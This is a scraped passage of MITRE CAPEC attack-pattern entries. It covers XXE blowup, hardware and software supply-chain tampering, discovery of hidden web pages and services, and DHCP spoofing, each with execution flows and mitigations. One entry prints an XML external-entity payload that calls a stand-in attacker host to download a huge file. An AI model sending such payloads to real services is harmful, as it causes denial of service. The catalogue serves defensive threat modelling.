ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	231	Oversized Serialized Data Payloads
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	278	Web Services Protocol Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Find target web service: The adversary must first find a web service that takes input data in the form of a serialized language such as XML or YAML.

Experiment

Host malicious file on a server: The adversary will create a web server that contains a malicious file. This file will be extremely large, so that if a web service were to try to load it, the service would most likely hang.
Craft malicious data: Using the serialization language that the web service takes as input, the adversary will craft data that links to the malicious file using an external entity reference to the URL of the file.

Exploit

Send serialized data containing URI: The adversary will send specially crafted serialized data to the web service. When the web service loads the input, it will attempt to download the malicious file. Depending on the amount of memory the web service has, this could either crash the service or cause it to hang, resulting in a Denial of Service attack.

Prerequisites

A server that has an implementation that accepts entities containing URI values.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.

This attack may be mitigated by tweaking the serialized data parser to not resolve external entities. If external entities are needed, then implement a custom resolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.

Example Instances

In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.

<?xml version="1.0"?>
< !DOCTYPE bomb [
<!ENTITY detonate SYSTEM "http://www.malicious-badguy.com/myhugefile.exe">
]>
<bomb>&detonate;</bomb>

Related Weaknesses

CWE-ID	Weakness Name
611	Improper Restriction of XML External Entity Reference

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
43	XML External Entities

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Description, Mitigations, Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Consequences, Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	XML External Entities

2020-07-30 (Version 3.3)	XML External Entities Blowup

CAPEC-447: Design Alteration

Attack Pattern ID: 447

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	438	Modification During Manufacture
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	517	Documentation Alteration to Circumvent Dial-down
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	518	Documentation Alteration to Produce Under-performing Systems
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	519	Documentation Alteration to Cause Errors in System Design
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	521	Hardware Design Specifications Are Altered
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	671	Requirements for ASIC Functionality Maliciously Altered
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	674	Design for FPGA Maliciously Altered

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Design

Prerequisites

Access to system design documentation prior to the development phase. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.

Ability to forge web communications to deliver modified design documentation.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands
Availability	Unreliable Execution
Integrity	Alter Execution Logic

Mitigations

Assess design documentation prior to development to ensure that they function as intended and without any malicious functionality.

Ensure that design documentation is saved in a secure location and has proper access controls set in place to avoid unnecessary modification.

Related Weaknesses

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, References, Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Malicious Logic Insertion into Product Software during Update

CAPEC-674: Design for FPGA Maliciously Altered

Attack Pattern ID: 674

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	447	Design Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Design

Prerequisites

An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed.

Skills Required

[Level: High]

An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced.

Consequences

Scope	Impact	Likelihood
Integrity	Alter Execution Logic

Mitigations

Utilize DMEA’s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.

Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for FPGA programming and program uploads to FPGA chips.

Require that provenance of COTS microelectronic components be known whenever procured.

Conduct detailed vendor assessment before acquiring COTS hardware.

Example Instances

An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

[REF-662] Jeremy Muldavin. "Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC)". Office of the Deputy Assistant Secretary of Defense for Systems Engineering. 2017-11.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-143: Detect Unpublicized Web Pages

Attack Pattern ID: 143

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	150	Collect Data from Common Resource Locations

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Find target web site: An adversary finds a target web site that they think may have unpublicized web pages

Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

Techniques
Use Dirbuster to brute force directories and file names to find unpublicized pages
Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

Try to find weaknesses or information: The adversary will try to find weaknesses or information on the unpublicized pages that the targeted site did not intend to be public
Techniques
Manually analyze files or pages for information that could be useful in a further attack
Use a static analysis tool to find weaknesses in unpublished web pages

Exploit

Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

Prerequisites

The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack.

Resources Required

Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths.

Related Weaknesses

CWE-ID	Weakness Name
425	Direct Request ('Forced Browsing')

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-144: Detect Unpublicized Web Services

Attack Pattern ID: 144

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	150	Collect Data from Common Resource Locations

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Find target web site: An adversary finds a target web site that they think may have unpublicized web services

Techniques
Use Dirbuster to brute force directories and file names to find unpublicized web services
Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

Try to find weaknesses or information: The adversary will try to find weaknesses in the unpublicized services that the targeted site did not intend to be public
Techniques
Use Nikto to look for web service vulnerabilities

Exploit

Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

Prerequisites

The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack.

Resources Required

Related Weaknesses

CWE-ID	Weakness Name
425	Direct Request ('Forced Browsing')

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-673: Developer Signing Maliciously Altered Software

Attack Pattern ID: 673

Abstraction: Detailed

View customized information:

Description

This attack differs from CAPEC-206, since the developer is inadvertently signing malicious code they believe to be legitimate and which they are unware of any malicious modifications.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	669	Alteration of a Software Update

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

An adversary would need to have access to a targeted developer’s software development environment, including to their software build processes, where the adversary could ensure code maliciously tainted prior to a build process is included in software packages built.

Skills Required

[Level: High]

The adversary must have the skills to infiltrate a developer’s software development/build environment and to implant malicious code in developmental software code, a build server, or a software repository containing dependency code, which would be referenced to be included during the software build process.

Consequences

Scope	Impact	Likelihood
Integrity Confidentiality	Read Data Modify Data
Access Control Authorization	Gain Privileges Execute Unauthorized Commands

Mitigations

Have a security concept of operations (CONOPS) for the IDE that includes: Protecting the IDE via logical isolation using firewall and DMZ technologies/architectures; Maintaining strict security administration and configuration management of configuration management tools, developmental software and dependency code repositories, compilers, and system build tools.

Employ intrusion detection and malware detection capabilities on IDE systems where feasible.

Example Instances

An adversary who has infiltrated an organization’s build environment maliciously alters code intended to be included in a product’s software build via software dependency inclusion, part of the software build process. When the software product has been built, the developer electronically signs the finished product using their signing key. The recipient of the software product, an end user/customer, believes the software to reflect the developer’s intent with respect to functionality unaware of the adversary’s malicious intent harbored within.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.002	Supply Chain Compromise: Compromise Software Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-444: Development Alteration

Attack Pattern ID: 444

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	438	Modification During Manufacture
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	206	Signing Malicious Code
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	443	Malicious Logic Inserted Into Product by Authorized Developer
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	445	Malicious Logic Insertion into Product Software via Configuration Management Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	446	Malicious Logic Insertion into Product via Inclusion of Third-Party Component
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	511	Infiltration of Software Development Environment
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	516	Hardware Component Substitution During Baselining
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	520	Counterfeit Hardware Component Inserted During Product Assembly
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	532	Altered Installed BIOS
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	537	Infiltration of Hardware Development Environment
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	538	Open-Source Library Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	539	ASIC With Malicious Functionality
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	670	Software Development Tools Maliciously Altered
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	672	Malicious Code Implanted During Chip Programming
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	673	Developer Signing Maliciously Altered Software
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	678	System Build Data Maliciously Altered
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	691	Spoof Open-Source Software Metadata

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

Access to the system during the development phase to alter and/or modify software and hardware components. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands
Availability	Unreliable Execution
Integrity	Alter Execution Logic

Mitigations

Assess software and software components during development and prior to deployment to ensure that they function as intended and without any malicious functionality.

Related Weaknesses

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, References, Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Malicious Logic Insertion into Product Software via Externally Manipulated Component

CAPEC-697: DHCP Spoofing

Attack Pattern ID: 697

Abstraction: Standard

View customized information:

Description

An adversary masquerades as a legitimate Dynamic Host Configuration Protocol (DHCP) server by spoofing DHCP traffic, with the goal of redirecting network traffic or denying service to DHCP.

Extended Description

DHCP is broadcast to the entire Local Area Network (LAN) and does not have any form of authentication by default. Therefore, it is susceptible to spoofing.

An adversary with access to the target LAN can receive DHCP messages; obtaining the topology information required to potentially manipulate other hosts' network configurations.

To improve the likelihood of the DHCP request being serviced by the Rogue server, an adversary can first starve the DHCP pool.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	158	Sniffing Network Traffic

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Determine Exsisting DHCP lease: An adversary observes network traffic and waits for an existing DHCP lease to expire on a target machine in the LAN.
Techniques
Adversary observes LAN traffic for DHCP solicitations

Experiment

Capture the DHCP DISCOVER message: The adversary captures "DISCOVER" messages and crafts "OFFER" responses for the identified target MAC address. The success of this attack centers on the capturing of and responding to these "DISCOVER" messages.
Techniques
Adversary captures and responds to DHCP "DISCOVER" messages tailored to the target subnet.

Exploit

Compromise Network Access and Collect Network Activity: An adversary successfully acts as a rogue DHCP server by redirecting legitimate DHCP requests to itself.
Techniques
Adversary sends repeated DHCP "REQUEST" messages to quickly lease all the addresses within network's DHCP pool and forcing new DHCP requests to be handled by the rogue DHCP server.

Prerequisites

The adversary must have access to a machine within the target LAN which can send DHCP offers to the target.

Skills Required

[Level: Medium]

The adversary must identify potential targets for DHCP Spoofing and craft network configurations to obtain the desired results.

Resources Required

The adversary requires access to a machine within the target LAN on a network which does not secure its DHCP traffic through MAC-Forced Forwarding, port security, etc.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control	Read Data
Integrity Access Control	Modify Data Execute Unauthorized Commands
Availability	Resource Consumption

Mitigations

Design: MAC-Forced Forwarding

Implementation: Port Security and DHCP snooping

Implementation: Network-based Intrusion Detection Systems

Example Instances

In early 2019, Microsoft patched a critical vulnerability (CVE-2019-0547) in the Windows DHCP client which allowed remote code execution via crafted DHCP OFFER packets. [REF-739]

Related Weaknesses

CWE-ID	Weakness Name
923	Improper Restriction of Communication Channel to Intended Endpoints

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1557.003	Adversary-in-the-Middle: DHCP Spoofing

References

[REF-737] Yuval Lazar. "DHCP Spoofing 101". Pentera. 2021-11-03. <https://pentera.io/blog/dhcp-spoofing-101>. URL validated: 2022-09-22.

[REF-738] T. Melsen, S. Blake and Ericsson. "DHCP Spoofing 101". The Internet Society. 2006-06. <https://www.rfc-editor.org/rfc/rfc4562.html>. URL validated: 2022-09-22.

